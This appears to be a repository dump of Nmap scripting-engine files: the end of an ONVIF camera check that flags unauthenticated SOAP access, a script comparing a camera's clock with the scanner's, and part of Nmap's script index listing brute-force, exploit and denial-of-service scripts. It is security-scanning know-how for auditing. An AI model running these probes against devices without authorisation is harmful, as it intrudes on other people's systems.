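  local options = {header={["Content-Type"]='application/soap+xml; charset=utf-8; action="http://www.onvif.org/ver10/device/wsdl/GetScopes"'}}
  local response = http.post(host, port, path, options, nil, exploit)
  local body = response.body

  local has_envelope = body
    and (string.match(body, "</s:Envelope>") or string.match(body, "</env:Envelope>"))

  if response.status == 200 and has_envelope then
    output_tab.display = "Found vulnerable."
  else
    output_tab.display = "Not vulnerable."
  end

  return output_tab
end
--------------------------------------------------------------------------------
/onvif/onvif_post_timecomparion.nse:
--------------------------------------------------------------------------------
local http = require "http"
local shortport = require "shortport"
local stdnse = require "stdnse"
local string = require "string"
local table = require "table"
local vulns = require "vulns"
local datetime = require "datetime"


description = [[
视频设备时间戳与系统时间偏差5分钟以上,会导致视频录像时间较大偏差。
]]


author = "seaung"

license = "Same as Nmap--See https://nmap.org/book/man-legal.html"

categories = {"vuln_detect", "onvif_post_timecomparion"}


portrule = shortport.port_or_service( {80, 443}, {"http", "https"}, "tcp", "open")


--- Read the device clock over ONVIF and compare it with the scanner's clock.
-- The original reported 'get date err' only when every field was missing, so a
-- reply lacking just one field reached os.time and raised. All six fields are
-- required now, and each must parse as a decimal integer.
-- NOTE(review): os.time interprets the table in the scanner's local time zone,
-- so a device in another zone presumably shows skew even with a correct clock.
-- @param host NSE host table
-- @param port NSE port table
-- @return output table with the two timestamps and their difference
action = function(host, port)
  local sys_time = os.time()

  local output_tab = stdnse.output_table()
  local path = "/onvif/device_service"
  local exploit = [[<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope"><s:Body xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><GetSystemDateAndTime xmlns="http://www.onvif.org/ver10/device/wsdl"/></s:Body></s:Envelope>]]
  local options = {header={["Content-Type"]='application/soap+xml; charset=utf-8; action="http://www.onvif.org/ver10/device/wsdl/GetSystemDateAndTime"'}}
  local response = http.post(host, port, path, options, nil, exploit)
  local body = response.body

  -- One capture pattern per os.time field; the patterns are unchanged.
  local patterns = {
    year  = "<tt:Year>([^<]*)</tt:Year>",
    month = "<tt:Month>([^<]*)</tt:Month>",
    day   = "<tt:Day>([^<]*)</tt:Day>",
    hour  = "<tt:LocalDateTime><tt:Time><tt:Hour>([^<]*)</tt:Hour>",
    min   = "<tt:Minute>([^<]*)</tt:Minute>",
    sec   = "<tt:Second>([^<]*)</tt:Second>",
  }

  local stamp = {}
  if type(body) == "string" then
    for field, pattern in pairs(patterns) do
      local raw = string.match(body, pattern)
      stamp[field] = raw and tonumber(raw, 10)
    end
  end

  local complete = stamp.year and stamp.month and stamp.day
    and stamp.hour and stamp.min and stamp.sec
  if not complete then
    output_tab.yd_ipc_date_s = 'get date err'
    return output_tab
  end

  local ipc_date = os.time(stamp)
  local diff_time = math.abs(os.difftime(ipc_date, sys_time))

  -- diff_time_s was assigned as a global in the original.
  local diff_time_s
  if diff_time >= 60*5 then
    diff_time_s = 'diff_time greater than 5 minute'
  else
    diff_time_s = 'diff_time less than 5 minute'
  end

  if response.status == 200 or response.status == 401 then
    output_tab.yd_sys_time_s = sys_time
    output_tab.yd_ipc_date_s = ipc_date
    output_tab.yd_diff_time = diff_time
    output_tab.yd_diff_time_s = diff_time_s
  end

  return output_tab

end
--------------------------------------------------------------------------------
/script.db:
--------------------------------------------------------------------------------
Entry { filename = "acarsd-info.nse", categories = { "discovery", "safe", } }
Entry { filename = "address-info.nse", categories = { "default", "safe", } }
Entry { filename = "afp-brute.nse", categories = { "brute", "intrusive", } }
Entry { filename = "afp-ls.nse", categories = { "discovery", "safe", } }
Entry { filename = "afp-path-vuln.nse", categories = { "exploit", "intrusive", "vuln", } }
Entry { filename = "afp-serverinfo.nse", categories = { "default", "discovery", "safe", } }
Entry { filename = "afp-showmount.nse", categories = { "discovery", "safe", } }
Entry { filename = "ajp-auth.nse", categories = { "auth", "default", "safe", } }
Entry { filename = "ajp-brute.nse", categories = { "brute", "intrusive", } }
Entry { filename = "ajp-headers.nse", categories = { "discovery", "safe", } }
Entry { filename = "ajp-methods.nse", categories = { "default", "safe", } }
Entry { filename = "ajp-request.nse", categories = { "discovery", "safe", } }
Entry { filename = "allseeingeye-info.nse", categories = { "discovery", "safe", "version", } }
Entry { filename = "amqp-info.nse", categories = { "default", "discovery", "safe", "version", } }
Entry { filename = "asn-query.nse", categories = { "discovery", "external", "safe", } }
Entry { filename = "auth-owners.nse", categories = { "default", "safe", } }
Entry { filename = "auth-spoof.nse", categories = { "malware", "safe", } }
Entry { filename = "backorifice-brute.nse", categories = { "brute", "intrusive", } }
Entry { filename = "backorifice-info.nse", categories = { "default", "discovery", "safe", } }
Entry { filename = "bacnet-info.nse", categories = { "discovery", "version", } }
Entry { filename = "banner.nse", categories = { "discovery", "safe", } }
Entry { filename = "bitcoin-getaddr.nse", categories = { "discovery", "safe", } }
Entry { filename = "bitcoin-info.nse", categories = { "discovery", "safe", } }
Entry { filename = "bitcoinrpc-info.nse", categories = { "default", "discovery", "safe", } }
Entry { filename = "bittorrent-discovery.nse", categories = { "discovery", "safe", } }
Entry { filename = "bjnp-discover.nse", categories = { "discovery", "safe", } }
Entry { filename = "broadcast-ataoe-discover.nse", categories = { "broadcast", "safe", } }
Entry { filename = "broadcast-avahi-dos.nse", categories = {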
"broadcast", "dos", "intrusive", "vuln", } } 29 | Entry { filename = "broadcast-bjnp-discover.nse", categories = { "broadcast", "safe", } } 30 | Entry { filename = "broadcast-db2-discover.nse", categories = { "broadcast", "safe", } } 31 | Entry { filename = "broadcast-dhcp-discover.nse", categories = { "broadcast", "safe", } } 32 | Entry { filename = "broadcast-dhcp6-discover.nse", categories = { "broadcast", "safe", } } 33 | Entry { filename = "broadcast-dns-service-discovery.nse", categories = { "broadcast", "safe", } } 34 | Entry { filename = "broadcast-dropbox-listener.nse", categories = { "broadcast", "safe", } } 35 | Entry { filename = "broadcast-eigrp-discovery.nse", categories = { "broadcast", "discovery", "safe", } } 36 | Entry { filename = "broadcast-hid-discoveryd.nse", categories = { "broadcast", "discovery", "safe", } } 37 | Entry { filename = "broadcast-igmp-discovery.nse", categories = { "broadcast", "discovery", "safe", } } 38 | Entry { filename = "broadcast-jenkins-discover.nse", categories = { "broadcast", "discovery", "safe", } } 39 | Entry { filename = "broadcast-listener.nse", categories = { "broadcast", "safe", } } 40 | Entry { filename = "broadcast-ms-sql-discover.nse", categories = { "broadcast", "safe", } } 41 | Entry { filename = "broadcast-netbios-master-browser.nse", categories = { "broadcast", "safe", } } 42 | Entry { filename = "broadcast-networker-discover.nse", categories = { "broadcast", "safe", } } 43 | Entry { filename = "broadcast-novell-locate.nse", categories = { "broadcast", "safe", } } 44 | Entry { filename = "broadcast-ospf2-discover.nse", categories = { "broadcast", "discovery", "safe", } } 45 | Entry { filename = "broadcast-pc-anywhere.nse", categories = { "broadcast", "safe", } } 46 | Entry { filename = "broadcast-pc-duo.nse", categories = { "broadcast", "safe", } } 47 | Entry { filename = "broadcast-pim-discovery.nse", categories = { "broadcast", "discovery", "safe", } } 48 | Entry { filename = "broadcast-ping.nse", 
categories = { "broadcast", "discovery", "safe", } } 49 | Entry { filename = "broadcast-pppoe-discover.nse", categories = { "broadcast", "safe", } } 50 | Entry { filename = "broadcast-rip-discover.nse", categories = { "broadcast", "safe", } } 51 | Entry { filename = "broadcast-ripng-discover.nse", categories = { "broadcast", "safe", } } 52 | Entry { filename = "broadcast-sonicwall-discover.nse", categories = { "broadcast", "safe", } } 53 | Entry { filename = "broadcast-sybase-asa-discover.nse", categories = { "broadcast", "safe", } } 54 | Entry { filename = "broadcast-tellstick-discover.nse", categories = { "broadcast", "safe", } } 55 | Entry { filename = "broadcast-upnp-info.nse", categories = { "broadcast", "safe", } } 56 | Entry { filename = "broadcast-versant-locate.nse", categories = { "broadcast", "safe", } } 57 | Entry { filename = "broadcast-wake-on-lan.nse", categories = { "broadcast", "safe", } } 58 | Entry { filename = "broadcast-wpad-discover.nse", categories = { "broadcast", "safe", } } 59 | Entry { filename = "broadcast-wsdd-discover.nse", categories = { "broadcast", "safe", } } 60 | Entry { filename = "broadcast-xdmcp-discover.nse", categories = { "broadcast", "safe", } } 61 | Entry { filename = "cassandra-brute.nse", categories = { "brute", "intrusive", } } 62 | Entry { filename = "cassandra-info.nse", categories = { "default", "discovery", "safe", } } 63 | Entry { filename = "cccam-version.nse", categories = { "version", } } 64 | Entry { filename = "cics-enum.nse", categories = { "brute", "intrusive", } } 65 | Entry { filename = "cics-info.nse", categories = { "discovery", "safe", } } 66 | Entry { filename = "cics-user-brute.nse", categories = { "brute", "intrusive", } } 67 | Entry { filename = "cics-user-enum.nse", categories = { "brute", "intrusive", } } 68 | Entry { filename = "citrix-brute-xml.nse", categories = { "brute", "intrusive", } } 69 | Entry { filename = "citrix-enum-apps-xml.nse", categories = { "discovery", "safe", } } 70 | Entry { 
filename = "citrix-enum-apps.nse", categories = { "discovery", "safe", } } 71 | Entry { filename = "citrix-enum-servers-xml.nse", categories = { "discovery", "safe", } } 72 | Entry { filename = "citrix-enum-servers.nse", categories = { "discovery", "safe", } } 73 | Entry { filename = "clamav-exec.nse", categories = { "exploit", "vuln", } } 74 | Entry { filename = "clock-skew.nse", categories = { "default", "safe", } } 75 | Entry { filename = "coap-resources.nse", categories = { "discovery", "safe", } } 76 | Entry { filename = "couchdb-databases.nse", categories = { "discovery", "safe", } } 77 | Entry { filename = "couchdb-stats.nse", categories = { "discovery", "safe", } } 78 | Entry { filename = "creds-summary.nse", categories = { "auth", "default", "safe", } } 79 | Entry { filename = "cups-info.nse", categories = { "discovery", "safe", } } 80 | Entry { filename = "cups-queue-info.nse", categories = { "discovery", "safe", } } 81 | Entry { filename = "cvs-brute-repository.nse", categories = { "brute", "intrusive", } } 82 | Entry { filename = "cvs-brute.nse", categories = { "brute", "intrusive", } } 83 | Entry { filename = "daap-get-library.nse", categories = { "discovery", "safe", } } 84 | Entry { filename = "daytime.nse", categories = { "discovery", "safe", } } 85 | Entry { filename = "db2-das-info.nse", categories = { "discovery", "safe", "version", } } 86 | Entry { filename = "deluge-rpc-brute.nse", categories = { "brute", "intrusive", } } 87 | Entry { filename = "dhcp-discover.nse", categories = { "discovery", "safe", } } 88 | Entry { filename = "dicom-brute.nse", categories = { "auth", "brute", } } 89 | Entry { filename = "dicom-ping.nse", categories = { "auth", "default", "discovery", "safe", } } 90 | Entry { filename = "dict-info.nse", categories = { "discovery", "safe", } } 91 | Entry { filename = "distcc-cve2004-2687.nse", categories = { "exploit", "intrusive", "vuln", } } 92 | Entry { filename = "dns-blacklist.nse", categories = { "external", "safe", } } 
93 | Entry { filename = "dns-brute.nse", categories = { "discovery", "intrusive", } } 94 | Entry { filename = "dns-cache-snoop.nse", categories = { "discovery", "intrusive", } } 95 | Entry { filename = "dns-check-zone.nse", categories = { "discovery", "external", "safe", } } 96 | Entry { filename = "dns-client-subnet-scan.nse", categories = { "discovery", "safe", } } 97 | Entry { filename = "dns-fuzz.nse", categories = { "fuzzer", "intrusive", } } 98 | Entry { filename = "dns-ip6-arpa-scan.nse", categories = { "discovery", "intrusive", } } 99 | Entry { filename = "dns-nsec-enum.nse", categories = { "discovery", "intrusive", } } 100 | Entry { filename = "dns-nsec3-enum.nse", categories = { "discovery", "intrusive", } } 101 | Entry { filename = "dns-nsid.nse", categories = { "default", "discovery", "safe", } } 102 | Entry { filename = "dns-random-srcport.nse", categories = { "external", "intrusive", } } 103 | Entry { filename = "dns-random-txid.nse", categories = { "external", "intrusive", } } 104 | Entry { filename = "dns-recursion.nse", categories = { "default", "safe", } } 105 | Entry { filename = "dns-service-discovery.nse", categories = { "default", "discovery", "safe", } } 106 | Entry { filename = "dns-srv-enum.nse", categories = { "discovery", "safe", } } 107 | Entry { filename = "dns-update.nse", categories = { "intrusive", "vuln", } } 108 | Entry { filename = "dns-zeustracker.nse", categories = { "discovery", "external", "malware", "safe", } } 109 | Entry { filename = "dns-zone-transfer.nse", categories = { "discovery", "intrusive", } } 110 | Entry { filename = "docker-version.nse", categories = { "version", } } 111 | Entry { filename = "domcon-brute.nse", categories = { "brute", "intrusive", } } 112 | Entry { filename = "domcon-cmd.nse", categories = { "auth", "intrusive", } } 113 | Entry { filename = "domino-enum-users.nse", categories = { "auth", "intrusive", } } 114 | Entry { filename = "dpap-brute.nse", categories = { "brute", "intrusive", } } 115 | 
Entry { filename = "drda-brute.nse", categories = { "brute", "intrusive", } } 116 | Entry { filename = "drda-info.nse", categories = { "discovery", "safe", "version", } } 117 | Entry { filename = "duplicates.nse", categories = { "safe", } } 118 | Entry { filename = "eap-info.nse", categories = { "broadcast", "safe", } } 119 | Entry { filename = "enip-info.nse", categories = { "discovery", "version", } } 120 | Entry { filename = "epmd-info.nse", categories = { "default", "discovery", "safe", } } 121 | Entry { filename = "eppc-enum-processes.nse", categories = { "discovery", "safe", } } 122 | Entry { filename = "fcrdns.nse", categories = { "discovery", "safe", } } 123 | Entry { filename = "finger.nse", categories = { "default", "discovery", "safe", } } 124 | Entry { filename = "fingerprint-strings.nse", categories = { "version", } } 125 | Entry { filename = "firewalk.nse", categories = { "discovery", "safe", } } 126 | Entry { filename = "firewall-bypass.nse", categories = { "intrusive", "vuln", } } 127 | Entry { filename = "flume-master-info.nse", categories = { "default", "discovery", "safe", } } 128 | Entry { filename = "fox-info.nse", categories = { "discovery", "version", } } 129 | Entry { filename = "freelancer-info.nse", categories = { "default", "discovery", "safe", "version", } } 130 | Entry { filename = "ftp-anon.nse", categories = { "auth", "default", "safe", } } 131 | Entry { filename = "ftp-bounce.nse", categories = { "default", "safe", } } 132 | Entry { filename = "ftp-brute.nse", categories = { "brute", "intrusive", } } 133 | Entry { filename = "ftp-libopie.nse", categories = { "intrusive", "vuln", } } 134 | Entry { filename = "ftp-proftpd-backdoor.nse", categories = { "exploit", "intrusive", "malware", "vuln", } } 135 | Entry { filename = "ftp-syst.nse", categories = { "default", "discovery", "safe", } } 136 | Entry { filename = "ftp-vsftpd-backdoor.nse", categories = { "exploit", "intrusive", "malware", "vuln", } } 137 | Entry { filename = 
"ftp-vuln-cve2010-4221.nse", categories = { "intrusive", "vuln", } } 138 | Entry { filename = "ganglia-info.nse", categories = { "default", "discovery", "safe", } } 139 | Entry { filename = "giop-info.nse", categories = { "default", "discovery", "safe", } } 140 | Entry { filename = "gkrellm-info.nse", categories = { "discovery", "safe", } } 141 | Entry { filename = "gopher-ls.nse", categories = { "default", "discovery", "safe", } } 142 | Entry { filename = "gpsd-info.nse", categories = { "discovery", "safe", } } 143 | Entry { filename = "hadoop-datanode-info.nse", categories = { "default", "discovery", "safe", } } 144 | Entry { filename = "hadoop-jobtracker-info.nse", categories = { "default", "discovery", "safe", } } 145 | Entry { filename = "hadoop-namenode-info.nse", categories = { "default", "discovery", "safe", } } 146 | Entry { filename = "hadoop-secondary-namenode-info.nse", categories = { "default", "discovery", "safe", } } 147 | Entry { filename = "hadoop-tasktracker-info.nse", categories = { "default", "discovery", "safe", } } 148 | Entry { filename = "hbase-master-info.nse", categories = { "default", "discovery", "safe", } } 149 | Entry { filename = "hbase-region-info.nse", categories = { "default", "discovery", "safe", } } 150 | Entry { filename = "hddtemp-info.nse", categories = { "default", "discovery", "safe", } } 151 | Entry { filename = "hnap-info.nse", categories = { "default", "discovery", "safe", "version", } } 152 | Entry { filename = "hostmap-bfk.nse", categories = { "discovery", "external", } } 153 | Entry { filename = "hostmap-crtsh.nse", categories = { "discovery", "external", } } 154 | Entry { filename = "hostmap-robtex.nse", categories = { "discovery", "external", "safe", } } 155 | Entry { filename = "http-adobe-coldfusion-apsa1301.nse", categories = { "exploit", "vuln", } } 156 | Entry { filename = "http-affiliate-id.nse", categories = { "discovery", "safe", } } 157 | Entry { filename = "http-apache-negotiation.nse", categories = { 
"discovery", "safe", } } 158 | Entry { filename = "http-apache-server-status.nse", categories = { "discovery", "safe", } } 159 | Entry { filename = "http-aspnet-debug.nse", categories = { "discovery", "vuln", } } 160 | Entry { filename = "http-auth-finder.nse", categories = { "discovery", "safe", } } 161 | Entry { filename = "http-auth.nse", categories = { "auth", "default", "safe", } } 162 | Entry { filename = "http-avaya-ipoffice-users.nse", categories = { "exploit", "vuln", } } 163 | Entry { filename = "http-awstatstotals-exec.nse", categories = { "exploit", "intrusive", "vuln", } } 164 | Entry { filename = "http-axis2-dir-traversal.nse", categories = { "exploit", "intrusive", "vuln", } } 165 | Entry { filename = "http-backup-finder.nse", categories = { "discovery", "safe", } } 166 | Entry { filename = "http-barracuda-dir-traversal.nse", categories = { "auth", "exploit", "intrusive", } } 167 | Entry { filename = "http-bigip-cookie.nse", categories = { "discovery", "safe", } } 168 | Entry { filename = "http-brute.nse", categories = { "brute", "intrusive", } } 169 | Entry { filename = "http-cakephp-version.nse", categories = { "discovery", "safe", } } 170 | Entry { filename = "http-chrono.nse", categories = { "discovery", "intrusive", } } 171 | Entry { filename = "http-cisco-anyconnect.nse", categories = { "default", "discovery", "safe", } } 172 | Entry { filename = "http-coldfusion-subzero.nse", categories = { "exploit", } } 173 | Entry { filename = "http-comments-displayer.nse", categories = { "discovery", "safe", } } 174 | Entry { filename = "http-config-backup.nse", categories = { "auth", "intrusive", } } 175 | Entry { filename = "http-cookie-flags.nse", categories = { "default", "safe", "vuln", } } 176 | Entry { filename = "http-cors.nse", categories = { "default", "discovery", "safe", } } 177 | Entry { filename = "http-cross-domain-policy.nse", categories = { "external", "safe", "vuln", } } 178 | Entry { filename = "http-csrf.nse", categories = { "exploit", 
"intrusive", "vuln", } } 179 | Entry { filename = "http-date.nse", categories = { "discovery", "safe", } } 180 | Entry { filename = "http-default-accounts.nse", categories = { "auth", "discovery", "intrusive", } } 181 | Entry { filename = "http-devframework.nse", categories = { "discovery", "intrusive", } } 182 | Entry { filename = "http-dlink-backdoor.nse", categories = { "exploit", "vuln", } } 183 | Entry { filename = "http-dombased-xss.nse", categories = { "exploit", "intrusive", "vuln", } } 184 | Entry { filename = "http-domino-enum-passwords.nse", categories = { "auth", "intrusive", } } 185 | Entry { filename = "http-drupal-enum-users.nse", categories = { "discovery", "intrusive", } } 186 | Entry { filename = "http-drupal-enum.nse", categories = { "discovery", "intrusive", } } 187 | Entry { filename = "http-enum.nse", categories = { "discovery", "intrusive", "vuln", } } 188 | Entry { filename = "http-errors.nse", categories = { "discovery", "intrusive", } } 189 | Entry { filename = "http-exif-spider.nse", categories = { "intrusive", } } 190 | Entry { filename = "http-favicon.nse", categories = { "default", "discovery", "safe", } } 191 | Entry { filename = "http-feed.nse", categories = { "discovery", "intrusive", } } 192 | Entry { filename = "http-fetch.nse", categories = { "safe", } } 193 | Entry { filename = "http-fileupload-exploiter.nse", categories = { "exploit", "intrusive", "vuln", } } 194 | Entry { filename = "http-form-brute.nse", categories = { "brute", "intrusive", } } 195 | Entry { filename = "http-form-fuzzer.nse", categories = { "fuzzer", "intrusive", } } 196 | Entry { filename = "http-frontpage-login.nse", categories = { "safe", "vuln", } } 197 | Entry { filename = "http-generator.nse", categories = { "default", "discovery", "safe", } } 198 | Entry { filename = "http-git.nse", categories = { "default", "safe", "vuln", } } 199 | Entry { filename = "http-gitweb-projects-enum.nse", categories = { "discovery", "safe", } } 200 | Entry { filename = 
"http-google-malware.nse", categories = { "discovery", "external", "malware", "safe", } } 201 | Entry { filename = "http-grep.nse", categories = { "discovery", "safe", } } 202 | Entry { filename = "http-headers.nse", categories = { "discovery", "safe", } } 203 | Entry { filename = "http-hp-ilo-info.nse", categories = { "discovery", "safe", } } 204 | Entry { filename = "http-huawei-hg5xx-vuln.nse", categories = { "exploit", "vuln", } } 205 | Entry { filename = "http-icloud-findmyiphone.nse", categories = { "discovery", "external", "safe", } } 206 | Entry { filename = "http-icloud-sendmsg.nse", categories = { "discovery", "external", "safe", } } 207 | Entry { filename = "http-iis-short-name-brute.nse", categories = { "brute", "intrusive", } } 208 | Entry { filename = "http-iis-webdav-vuln.nse", categories = { "intrusive", "vuln", } } 209 | Entry { filename = "http-internal-ip-disclosure.nse", categories = { "discovery", "safe", "vuln", } } 210 | Entry { filename = "http-joomla-brute.nse", categories = { "brute", "intrusive", } } 211 | Entry { filename = "http-jsonp-detection.nse", categories = { "discovery", "safe", "vuln", } } 212 | Entry { filename = "http-litespeed-sourcecode-download.nse", categories = { "exploit", "intrusive", "vuln", } } 213 | Entry { filename = "http-ls.nse", categories = { "default", "discovery", "safe", } } 214 | Entry { filename = "http-majordomo2-dir-traversal.nse", categories = { "exploit", "intrusive", "vuln", } } 215 | Entry { filename = "http-malware-host.nse", categories = { "malware", "safe", } } 216 | Entry { filename = "http-mcmp.nse", categories = { "discovery", "safe", } } 217 | Entry { filename = "http-method-tamper.nse", categories = { "auth", "vuln", } } 218 | Entry { filename = "http-methods.nse", categories = { "default", "safe", } } 219 | Entry { filename = "http-mobileversion-checker.nse", categories = { "discovery", "safe", } } 220 | Entry { filename = "http-ntlm-info.nse", categories = { "default", "discovery", "safe", } 
} 221 | Entry { filename = "http-open-proxy.nse", categories = { "default", "discovery", "external", "safe", } } 222 | Entry { filename = "http-open-redirect.nse", categories = { "discovery", "intrusive", } } 223 | Entry { filename = "http-passwd.nse", categories = { "intrusive", "vuln", } } 224 | Entry { filename = "http-php-version.nse", categories = { "discovery", "safe", } } 225 | Entry { filename = "http-phpmyadmin-dir-traversal.nse", categories = { "exploit", "vuln", } } 226 | Entry { filename = "http-phpself-xss.nse", categories = { "fuzzer", "intrusive", "vuln", } } 227 | Entry { filename = "http-proxy-brute.nse", categories = { "brute", "external", "intrusive", } } 228 | Entry { filename = "http-put.nse", categories = { "discovery", "intrusive", } } 229 | Entry { filename = "http-qnap-nas-info.nse", categories = { "discovery", "safe", } } 230 | Entry { filename = "http-referer-checker.nse", categories = { "discovery", "safe", } } 231 | Entry { filename = "http-rfi-spider.nse", categories = { "intrusive", } } 232 | Entry { filename = "http-robots.txt.nse", categories = { "default", "discovery", "safe", } } 233 | Entry { filename = "http-robtex-reverse-ip.nse", categories = { "discovery", "external", "safe", } } 234 | Entry { filename = "http-robtex-shared-ns.nse", categories = { "discovery", "external", "safe", } } 235 | Entry { filename = "http-sap-netweaver-leak.nse", categories = { "discovery", "safe", } } 236 | Entry { filename = "http-security-headers.nse", categories = { "discovery", "safe", } } 237 | Entry { filename = "http-server-header.nse", categories = { "version", } } 238 | Entry { filename = "http-shellshock.nse", categories = { "exploit", "intrusive", "vuln", } } 239 | Entry { filename = "http-sitemap-generator.nse", categories = { "discovery", "intrusive", } } 240 | Entry { filename = "http-slowloris-check.nse", categories = { "safe", "vuln", } } 241 | Entry { filename = "http-slowloris.nse", categories = { "dos", "intrusive", } } 242 | 
Entry { filename = "http-sql-injection.nse", categories = { "intrusive", "vuln", } } 243 | Entry { filename = "http-stored-xss.nse", categories = { "exploit", "intrusive", "vuln", } } 244 | Entry { filename = "http-svn-enum.nse", categories = { "default", "discovery", "safe", } } 245 | Entry { filename = "http-svn-info.nse", categories = { "default", "discovery", "safe", } } 246 | Entry { filename = "http-title.nse", categories = { "default", "discovery", "safe", } } 247 | Entry { filename = "http-tplink-dir-traversal.nse", categories = { "exploit", "vuln", } } 248 | Entry { filename = "http-trace.nse", categories = { "discovery", "safe", "vuln", } } 249 | Entry { filename = "http-traceroute.nse", categories = { "discovery", "safe", } } 250 | Entry { filename = "http-trane-info.nse", categories = { "discovery", "safe", "version", } } 251 | Entry { filename = "http-unsafe-output-escaping.nse", categories = { "discovery", "intrusive", } } 252 | Entry { filename = "http-useragent-tester.nse", categories = { "discovery", "safe", } } 253 | Entry { filename = "http-userdir-enum.nse", categories = { "auth", "intrusive", } } 254 | Entry { filename = "http-vhosts.nse", categories = { "discovery", "intrusive", } } 255 | Entry { filename = "http-virustotal.nse", categories = { "external", "malware", "safe", } } 256 | Entry { filename = "http-vlcstreamer-ls.nse", categories = { "discovery", "safe", } } 257 | Entry { filename = "http-vmware-path-vuln.nse", categories = { "safe", "vuln", } } 258 | Entry { filename = "http-vuln-cve2006-3392.nse", categories = { "exploit", "intrusive", "vuln", } } 259 | Entry { filename = "http-vuln-cve2009-3960.nse", categories = { "exploit", "intrusive", "vuln", } } 260 | Entry { filename = "http-vuln-cve2010-0738.nse", categories = { "auth", "safe", "vuln", } } 261 | Entry { filename = "http-vuln-cve2010-2861.nse", categories = { "intrusive", "vuln", } } 262 | Entry { filename = "http-vuln-cve2011-3192.nse", categories = { "safe", "vuln", } } 
263 | Entry { filename = "http-vuln-cve2011-3368.nse", categories = { "intrusive", "vuln", } } 264 | Entry { filename = "http-vuln-cve2012-1823.nse", categories = { "exploit", "intrusive", "vuln", } } 265 | Entry { filename = "http-vuln-cve2013-0156.nse", categories = { "exploit", "vuln", } } 266 | Entry { filename = "http-vuln-cve2013-6786.nse", categories = { "exploit", "vuln", } } 267 | Entry { filename = "http-vuln-cve2013-7091.nse", categories = { "exploit", "intrusive", "vuln", } } 268 | Entry { filename = "http-vuln-cve2014-2126.nse", categories = { "safe", "vuln", } } 269 | Entry { filename = "http-vuln-cve2014-2127.nse", categories = { "safe", "vuln", } } 270 | Entry { filename = "http-vuln-cve2014-2128.nse", categories = { "safe", "vuln", } } 271 | Entry { filename = "http-vuln-cve2014-2129.nse", categories = { "safe", "vuln", } } 272 | Entry { filename = "http-vuln-cve2014-3704.nse", categories = { "exploit", "intrusive", "vuln", } } 273 | Entry { filename = "http-vuln-cve2014-8877.nse", categories = { "exploit", "intrusive", "vuln", } } 274 | Entry { filename = "http-vuln-cve2015-1427.nse", categories = { "intrusive", "vuln", } } 275 | Entry { filename = "http-vuln-cve2015-1635.nse", categories = { "safe", "vuln", } } 276 | Entry { filename = "http-vuln-cve2017-1001000.nse", categories = { "safe", "vuln", } } 277 | Entry { filename = "http-vuln-cve2017-5638.nse", categories = { "vuln", } } 278 | Entry { filename = "http-vuln-cve2017-5689.nse", categories = { "auth", "exploit", "vuln", } } 279 | Entry { filename = "http-vuln-cve2017-8917.nse", categories = { "intrusive", "vuln", } } 280 | Entry { filename = "http-vuln-misfortune-cookie.nse", categories = { "intrusive", "vuln", } } 281 | Entry { filename = "http-vuln-wnr1000-creds.nse", categories = { "exploit", "intrusive", "vuln", } } 282 | Entry { filename = "http-waf-detect.nse", categories = { "discovery", "intrusive", } } 283 | Entry { filename = "http-waf-fingerprint.nse", categories = { 
"discovery", "intrusive", } } 284 | Entry { filename = "http-webdav-scan.nse", categories = { "default", "discovery", "safe", } } 285 | Entry { filename = "http-wordpress-brute.nse", categories = { "brute", "intrusive", } } 286 | Entry { filename = "http-wordpress-enum.nse", categories = { "discovery", "intrusive", } } 287 | Entry { filename = "http-wordpress-users.nse", categories = { "auth", "intrusive", "vuln", } } 288 | Entry { filename = "http-xssed.nse", categories = { "discovery", "external", "safe", } } 289 | Entry { filename = "https-redirect.nse", categories = { "version", } } 290 | Entry { filename = "iax2-brute.nse", categories = { "brute", "intrusive", } } 291 | Entry { filename = "iax2-version.nse", categories = { "version", } } 292 | Entry { filename = "icap-info.nse", categories = { "discovery", "safe", } } 293 | Entry { filename = "iec-identify.nse", categories = { "discovery", "intrusive", } } 294 | Entry { filename = "ike-version.nse", categories = { "default", "discovery", "safe", "version", } } 295 | Entry { filename = "imap-brute.nse", categories = { "brute", "intrusive", } } 296 | Entry { filename = "imap-capabilities.nse", categories = { "default", "safe", } } 297 | Entry { filename = "imap-ntlm-info.nse", categories = { "default", "discovery", "safe", } } 298 | Entry { filename = "impress-remote-discover.nse", categories = { "brute", "intrusive", } } 299 | Entry { filename = "informix-brute.nse", categories = { "brute", "intrusive", } } 300 | Entry { filename = "informix-query.nse", categories = { "auth", "intrusive", } } 301 | Entry { filename = "informix-tables.nse", categories = { "auth", "intrusive", } } 302 | Entry { filename = "ip-forwarding.nse", categories = { "discovery", "safe", } } 303 | Entry { filename = "ip-geolocation-geoplugin.nse", categories = { "discovery", "external", "safe", } } 304 | Entry { filename = "ip-geolocation-ipinfodb.nse", categories = { "discovery", "external", "safe", } } 305 | Entry { filename = 
"ip-geolocation-map-bing.nse", categories = { "external", "safe", } } 306 | Entry { filename = "ip-geolocation-map-google.nse", categories = { "external", "safe", } } 307 | Entry { filename = "ip-geolocation-map-kml.nse", categories = { "safe", } } 308 | Entry { filename = "ip-geolocation-maxmind.nse", categories = { "discovery", "external", "safe", } } 309 | Entry { filename = "ip-https-discover.nse", categories = { "default", "discovery", "safe", } } 310 | Entry { filename = "ipidseq.nse", categories = { "discovery", "safe", } } 311 | Entry { filename = "ipmi-brute.nse", categories = { "brute", "intrusive", } } 312 | Entry { filename = "ipmi-cipher-zero.nse", categories = { "safe", "vuln", } } 313 | Entry { filename = "ipmi-version.nse", categories = { "discovery", "safe", } } 314 | Entry { filename = "ipv6-multicast-mld-list.nse", categories = { "broadcast", "discovery", } } 315 | Entry { filename = "ipv6-node-info.nse", categories = { "default", "discovery", "safe", } } 316 | Entry { filename = "ipv6-ra-flood.nse", categories = { "dos", "intrusive", } } 317 | Entry { filename = "irc-botnet-channels.nse", categories = { "discovery", "safe", "vuln", } } 318 | Entry { filename = "irc-brute.nse", categories = { "brute", "intrusive", } } 319 | Entry { filename = "irc-info.nse", categories = { "default", "discovery", "safe", } } 320 | Entry { filename = "irc-sasl-brute.nse", categories = { "brute", "intrusive", } } 321 | Entry { filename = "irc-unrealircd-backdoor.nse", categories = { "exploit", "intrusive", "malware", "vuln", } } 322 | Entry { filename = "iscsi-brute.nse", categories = { "brute", "intrusive", } } 323 | Entry { filename = "iscsi-info.nse", categories = { "default", "discovery", "safe", } } 324 | Entry { filename = "isns-info.nse", categories = { "discovery", "safe", } } 325 | Entry { filename = "jdwp-exec.nse", categories = { "exploit", "intrusive", } } 326 | Entry { filename = "jdwp-info.nse", categories = { "default", 